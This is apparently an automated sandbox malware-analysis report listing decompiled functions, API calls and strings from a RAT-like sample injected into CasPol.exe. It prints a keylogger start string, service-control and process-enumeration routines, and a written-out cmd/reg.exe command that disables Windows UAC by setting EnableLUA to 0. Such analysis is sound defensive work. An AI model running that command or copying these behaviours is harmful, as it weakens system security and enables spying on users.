                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                            • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                            • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                            • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                            Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                            • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                            • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                            • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                            Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                            • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                            • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                            • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                            Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                            • wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            • Opcode ID: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                            • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                            • Opcode Fuzzy Hash: 5930b91d6002e4bc173ab4be93e7cb7fd053249898d40d7797ac70fa62357d50
                            • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                            Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                            • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                            • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: XQG
                            • API String ID: 1958988193-3606453820
                            • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                            • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                            • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                            • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                            Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegisterClassExA.USER32(00000030), ref: 0041D55B
                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                            • GetLastError.KERNEL32 ref: 0041D580
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                            • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                            • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                            • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                            Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                            • CloseHandle.KERNEL32(?), ref: 004077AA
                            • CloseHandle.KERNEL32(?), ref: 004077AF
                            Strings
                            • C:\Windows\System32\cmd.exe, xrefs: 00407796
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                            • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                            • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                            • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                            Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                            Download Yara Rule
                            Strings
                            • SG, xrefs: 004076DA
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 004076C4
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            • API String ID: 0-3287720024
                            • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                            • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                            • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                            • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                            Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                            • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                            • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                            • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                            • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                            Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            • API String ID: 2993684571-305739064
                            • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                            • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                            • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                            • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                            Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                            • Sleep.KERNEL32(00002710), ref: 0041AE07
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                            • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                            • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                            • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                            Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            • API String ID: 3024135584-2418719853
                            • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                            • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                            • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                            • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                            Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                            • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                            • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                            • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                            Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • _free.LIBCMT ref: 00444E06
                            • _free.LIBCMT ref: 00444E1D
                            • _free.LIBCMT ref: 00444E3C
                            • _free.LIBCMT ref: 00444E57
                            • _free.LIBCMT ref: 00444E6E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID:
                            • API String ID: 3033488037-0
                            • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                            • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                            • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                            • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                            Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                            • _free.LIBCMT ref: 004493BD
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00449589
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                            • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                            • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                            • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                            Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                            • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                              • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 4269425633-0
                            • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                            • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                            • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                            • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                            Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                            • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                            • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                            • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                            Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                            • __alloca_probe_16.LIBCMT ref: 004511B1
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                            • __freea.LIBCMT ref: 0045121D
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                            • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                            • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                            • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                            Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                            • _free.LIBCMT ref: 0044F3BF
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                            • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                            • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                            • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                            Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                            • _free.LIBCMT ref: 004482D3
                            • _free.LIBCMT ref: 004482FA
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                            • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                            • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                            • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
